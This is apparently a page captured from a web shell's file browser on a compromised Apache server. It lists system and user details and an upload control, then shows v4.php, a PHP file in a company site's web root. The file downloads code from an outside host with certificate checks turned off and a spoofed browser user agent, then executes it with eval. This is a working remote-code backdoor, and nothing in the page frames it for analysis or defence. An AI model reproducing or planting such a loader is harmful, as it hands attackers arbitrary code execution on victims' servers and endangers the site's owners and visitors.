HEX
Server: Apache
System: Linux ruweb06.doruk.net.tr 6.8.0-79-generic #79-Ubuntu SMP PREEMPT_DYNAMIC Tue Aug 12 14:42:46 UTC 2025 x86_64
User: ilgazhavalandirma.com_lfvghapcl4 (11494)
PHP: 7.4.33
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/ilgazhavalandirma.com.tr/httpdocs/v4.php
<?php
// Menggunakan cURL
function execute_php_from_url_curl($url) {
    try {
        // Inisialisasi cURL
        $ch = curl_init();
        
        // Set opsi cURL
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        
        // Eksekusi request
        $code = curl_exec($ch);
        
        // Cek error
        if (curl_errno($ch)) {
            throw new Exception("cURL Error: " . curl_error($ch));
        }
        
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if ($http_code !== 200) {
            throw new Exception("HTTP Error: " . $http_code);
        }
        
        // Tutup cURL
        curl_close($ch);
        
        // Menjalankan kode PHP
        eval("?>".$code);
        
    } catch (Exception $e) {
        echo "Error: " . $e->getMessage();
    }
}

// URL target
$url = "https://stepmomhub.com/3.txt";

// Eksekusi kode
execute_php_from_url_curl($url);
?>